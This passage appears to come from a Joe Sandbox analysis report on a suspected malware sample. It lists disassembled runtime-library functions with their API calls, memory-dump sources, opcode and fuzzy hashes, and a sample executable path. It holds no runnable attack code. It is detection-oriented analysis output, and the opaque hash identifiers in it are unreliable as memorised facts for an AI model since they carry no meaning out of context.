                                                                                                          • Part of subcall function 00787CB9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00787D0B,00000014,?,00787D4C,00000014,?,00762D32,00000000,00000014,00000000,3F07E9DB), ref: 00787CC5
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00787D9E
                                                                                                        • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,3F07E9DB,?,?,?,Function_00048330,000000FF), ref: 00787DC6
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00787E01
                                                                                                        • __Cnd_broadcast.LIBCPMT ref: 00787E12
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                                                        • String ID:
                                                                                                        • API String ID: 420990631-0
                                                                                                        • Opcode ID: afce54a0b36a22663e5370f04e59bb83d0d330dbe1154648dd1a47c8b17c3180
                                                                                                        • Instruction ID: c5e118aa56cdb933bcd0adae61c965c92e071093c49cad5e2600c8f6feb63439
                                                                                                        • Opcode Fuzzy Hash: afce54a0b36a22663e5370f04e59bb83d0d330dbe1154648dd1a47c8b17c3180
                                                                                                        • Instruction Fuzzy Hash: 3E118172988600EBCA597B659C0AF2F7768EB55B20B20441EF80693252DF3DD801CBB5
                                                                                                        Function 00796977 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(007808E7,007808E7,8B18EC83,00790C77,00797E78,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 0079697C
                                                                                                        • _free.LIBCMT ref: 007969D9
                                                                                                        • _free.LIBCMT ref: 00796A0F
                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 00796A1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2283115069-0
                                                                                                        • Opcode ID: 1f5f06e98b408f0dc861c6fb521bd65dd68a5e8fad93bfab3817e1e8ccd85b2f
                                                                                                        • Instruction ID: 29e0402518d16c4ecadad9fddd4de76dc9cc205a5ae52d9afda483689b671e37
                                                                                                        • Opcode Fuzzy Hash: 1f5f06e98b408f0dc861c6fb521bd65dd68a5e8fad93bfab3817e1e8ccd85b2f
                                                                                                        • Instruction Fuzzy Hash: AB1108B2204600ABDF517778BC89E2F269DEBC2776721432DF124921E2ED7E9C428165
                                                                                                        Function 007998EF Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,007A5439,?,?,?,00000020,00000001), ref: 00799905
                                                                                                        • GetLastError.KERNEL32(?,007A5439,?,?,?,00000020,00000001), ref: 0079990F
                                                                                                        • __dosmaperr.LIBCMT ref: 00799916
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2398240785-0
                                                                                                        • Opcode ID: b18fb24bcaf24490329569a54250974807bb25a2c171cddb160d3b9b3086dddc
                                                                                                        • Instruction ID: 5a54ac94aff599c9d0791d78052efc7a865a535f71899b1724b7b22afd9bed2f
                                                                                                        • Opcode Fuzzy Hash: b18fb24bcaf24490329569a54250974807bb25a2c171cddb160d3b9b3086dddc
                                                                                                        • Instruction Fuzzy Hash: 52F01231600119BB9F211B6AEC08E5BBF69FF853B03048519F61DD6120D739E851DBD0
                                                                                                        Function 00799958 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,007A53C4,?,?,?,?,00000020,00000001), ref: 0079996E
                                                                                                        • GetLastError.KERNEL32(?,007A53C4,?,?,?,?,00000020,00000001), ref: 00799978
                                                                                                        • __dosmaperr.LIBCMT ref: 0079997F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2398240785-0
                                                                                                        • Opcode ID: fde96dfbf9198a6baae910c891c5751334dad02618c2009026cb4509bc1374b1
                                                                                                        • Instruction ID: 42c1cd047a8548970abe376d3594ac483c8fffd0085296aee35a475a33209aa7
                                                                                                        • Opcode Fuzzy Hash: fde96dfbf9198a6baae910c891c5751334dad02618c2009026cb4509bc1374b1
                                                                                                        • Instruction Fuzzy Hash: F2F01231600115BB9F205BAAEC08D9BFF69FF853B03058519B61DD6120D739E851DBE0
                                                                                                        Function 007A6F9A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000), ref: 007A6FB1
                                                                                                        • GetLastError.KERNEL32(?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?,00000000,?,00797AE2,8B18EC83), ref: 007A6FBD
                                                                                                          • Part of subcall function 007A6F83: CloseHandle.KERNEL32(FFFFFFFE,007A6FCD,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?,00000000), ref: 007A6F93
                                                                                                        • ___initconout.LIBCMT ref: 007A6FCD
                                                                                                          • Part of subcall function 007A6F45: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007A6F74,007A3A71,00000000,?,00797596,?,?,00000000,?), ref: 007A6F58
                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?), ref: 007A6FE2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744216297-0
                                                                                                        • Opcode ID: 5b2949f7ad69e05f1846d0264dbf3f70942e67c72f520dac4f192d859d6ff658
                                                                                                        • Instruction ID: e7e8d11081ea0c811a54b89aff07fb21020958097ced15a0f055c9e4994e7919
                                                                                                        • Opcode Fuzzy Hash: 5b2949f7ad69e05f1846d0264dbf3f70942e67c72f520dac4f192d859d6ff658
                                                                                                        • Instruction Fuzzy Hash: C2F0A53A510219BFCF622FD5EC1CE9A3F26FF497A1B088254FA1895530D63A9860DB94
                                                                                                        Function 0078985A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SleepConditionVariableCS.KERNEL32(?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078987D
                                                                                                        • LeaveCriticalSection.KERNEL32(007C7FA8,007CBDC0,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789887
                                                                                                        • WaitForSingleObjectEx.KERNEL32(007CBDC0,00000000,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789898
                                                                                                        • EnterCriticalSection.KERNEL32(007C7FA8,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078989F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3269011525-0
                                                                                                        • Opcode ID: 583b0d73c68cd96d9d5c3ce1373da333d47f33d7ee145ebf4dce483e0d0cf8ce
                                                                                                        • Instruction ID: 8bea7290421a0b714ba7cd91dc7dff55e5ca41ab4532b633c62cb1c2f46d317b
                                                                                                        • Opcode Fuzzy Hash: 583b0d73c68cd96d9d5c3ce1373da333d47f33d7ee145ebf4dce483e0d0cf8ce
                                                                                                        • Instruction Fuzzy Hash: A3E09231A89128AFCA0A2B45EC48F9E3F14BF05722B04812CF60966160CE7D1812CFD8
                                                                                                        Function 007935C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                        • API String ID: 0-1978484262
                                                                                                        • Opcode ID: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
                                                                                                        • Instruction ID: 2f657a6d0c2f8ce7be272932ca4034a1cf55a35df5b122c873ed1aec7ca77c87
                                                                                                        • Opcode Fuzzy Hash: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
                                                                                                        • Instruction Fuzzy Hash: 4E415FB1A00214FFDF219F99A886DAEBBB8EB85310B10406AF504E7351DA799B40CB91
                                                                                                        Function 0079F5B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0079F35F: GetOEMCP.KERNEL32(00000000,0079F5D0,0079721B,00000000,8B18EC83,8B18EC83,00000000,?,0079721B), ref: 0079F38A
                                                                                                        • _free.LIBCMT ref: 0079F62D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: hV|
                                                                                                        • API String ID: 269201875-215450703
                                                                                                        • Opcode ID: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
                                                                                                        • Instruction ID: fa81f7552a7d0e762bd0a90a602b9fd185891210681311f2a7239139ec9a15f2
                                                                                                        • Opcode Fuzzy Hash: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
                                                                                                        • Instruction Fuzzy Hash: 8131B071900209AFCF01DF68E844EDE77B4EF45324F10416AF910DB2A1EB7A9D51CB60
                                                                                                        Function 007644C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 007644EB
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0076453A
                                                                                                          • Part of subcall function 0078863E: _Yarn.LIBCPMT ref: 0078865D
                                                                                                          • Part of subcall function 0078863E: _Yarn.LIBCPMT ref: 00788681
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 1908188788-1405518554
                                                                                                        • Opcode ID: f01502ee5abce357050af823c1b2de2e0fb788ebaa216984aadcb3c4a81f78f6
                                                                                                        • Instruction ID: df436d9e3bcd22579560ba80f2367a91c94a77f34045141637d491a8b890e6b1
                                                                                                        • Opcode Fuzzy Hash: f01502ee5abce357050af823c1b2de2e0fb788ebaa216984aadcb3c4a81f78f6
                                                                                                        • Instruction Fuzzy Hash: 83119171904B84DFD320CF69C905B57BBF4EB19710F004A1EE49AC7B81D7B9A5048B95
                                                                                                        Function 007A0F6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: ?{
                                                                                                        • API String ID: 269201875-2067273236
                                                                                                        • Opcode ID: 0f48a75bd119926560d3cb0b909fe7935817393fb4e93b3deacc08690bbf6985
                                                                                                        • Instruction ID: c4f19ea03b90e35f166402b01894b77dc781f925a3765eec68a91e55e1c94663
                                                                                                        • Opcode Fuzzy Hash: 0f48a75bd119926560d3cb0b909fe7935817393fb4e93b3deacc08690bbf6985
                                                                                                        • Instruction Fuzzy Hash: BFF0A93340D210AEEB256A616C46F9B7759EBC3771F14053AF90C6A142DA69584286F1